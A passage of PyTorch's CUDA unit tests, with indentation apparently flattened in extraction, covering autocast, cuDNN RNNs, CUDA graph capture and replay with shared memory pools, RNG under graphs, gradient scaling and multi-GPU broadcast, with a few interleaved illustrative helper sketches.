# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda'):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter; we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda'):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# The autocast wrapper requires that at::_cudnn_rnn is autograd-exposed. This check can't
# guarantee that, but if it fails, it indicates some funny business has occurred and we
# should double-check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Checks whether autocast re-caches the same parameters when the module
# is executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda'):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda'):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
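# Illustrative sketch (not part of the test suite): the same capture/replay flow via the
# torch.cuda.graph context manager, which wraps capture_begin()/capture_end() on an internal
# side stream. Assumes a CUDA >= 11 build with graph support, as for the test above.
def _sketch_graph_capture_with_context_manager():
    g = torch.cuda.CUDAGraph()
    a = torch.full((1000,), 1, device="cuda")
    # Warm up on a side stream before capture, mirroring the pattern used elsewhere in this file.
    s = torch.cuda.Stream()
    s.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s):
        b = a + 1
    torch.cuda.current_stream().wait_stream(s)
    with torch.cuda.graph(g):
        b = a + 1
    g.replay()  # reruns the captured "b = a + 1" on the capture's buffers
    return b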
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
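# Illustrative sketch (not part of the test suite) of the two pool-sharing idioms exercised
# above: a later capture can reuse an earlier capture's private memory pool by passing either
# g0.pool() or a shared torch.cuda.graph_pool_handle() to capture_begin().
def _sketch_share_pool_between_captures():
    g0, g1 = torch.cuda.CUDAGraph(), torch.cuda.CUDAGraph()
    a = torch.ones((1000,), device="cuda")
    s = torch.cuda.Stream()
    s.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s):
        g0.capture_begin()
        b = a + 1
        g0.capture_end()
        g1.capture_begin(g0.pool())  # g1 allocates from g0's private pool
        c = b + 1
        g1.capture_end()
    torch.cuda.current_stream().wait_stream(s)
    return g0, g1, b, c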
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If the pool is shared, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" to have mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# A dummy allocation triggers process_events, which should successfully process b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if a user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
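# Illustrative sketch (not part of the test suite): the ordinary eager GradScaler loop that the
# graphed version above mirrors. model, opt, data_batches, and targets are placeholders, not
# objects defined in this file.
def _sketch_eager_grad_scaler_loop(model, opt, data_batches, targets):
    scaler = torch.cuda.amp.GradScaler()
    for data, target in zip(data_batches, targets):
        opt.zero_grad(set_to_none=True)
        with torch.cuda.amp.autocast():
            loss = torch.nn.functional.mse_loss(model(data), target)
        scaler.scale(loss).backward()
        scaler.step(opt)    # unscales grads; skips the step if any grad is inf/nan
        scaler.update()     # adjusts the scale factor for the next iteration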
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNG states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None, momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
